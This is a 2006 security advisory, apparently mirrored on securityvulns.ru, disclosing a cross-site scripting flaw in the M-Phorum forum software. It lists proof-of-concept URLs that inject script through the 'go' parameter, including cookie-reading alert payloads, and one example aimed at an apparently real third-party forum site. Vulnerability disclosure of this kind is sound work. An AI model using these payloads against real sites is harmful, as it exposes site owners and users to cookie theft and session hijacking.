Computer Security

Security Advisory: M-Phorum Cross Site Scripting
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  txtForum: Script Injection Vulnerability

  [SA19165] Nodez "op" File Inclusion and Cross-Site Scripting

  txtForum: Multiple XSS Vulnerabilities

  MyBloggie: Multiple XSS Vulnerabilities

From:okan alp <codexploder_(at)_hotmail.com>
Date:09.03.2006
Subject:M-Phorum Cross Site Scripting

---------------------------------------------------------------------------------
----
M-Phorum Cross Site Scripting

Site:http://m-phorum.sourceforge.net/site/

Credit : CodeXpLoder'tq
webpage:www.biyosecurity.com
Mail   :codexploder@linuxmail.org

---------------------------------------------------------------------------------
----
M-Phorum

http://victim/path/index.php?go="><script>alert(document.
cookie)</script>
http://victim/path/index.
php?go="><script>alert(/Codexploder'tq/)</script>

http://victim/path/index.php?go="><script>alert(document.
domain)</script>



http://victim/path/?go="><script>alert(document.
cookie)</script>
http:
//victim/path/?go="><script>alert(/BiyoSecurityTeam/)</s
cript>
http://victim/path/?go="><script>alert(document.
domain)</script>

---------------------------------------------------------------------------------
----
Example:


http://www.depijpsite.nl/forum2/index.php?go="><script>alert(/C
odexploder'tq/)</script>
---------------------------------------------------------------------------------
-------
Source:

http://www.blogcu.com/Liz0ziM/338295

http://biyosecurity.be/bugs/mphorum.txt

_________________________________________________________________
Sohbet ve eglence, web kamera ve sesli sohbet Messenger'de.
http://messenger.msn.com/?mkt=tr&DI=3490&XAPID=2584

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru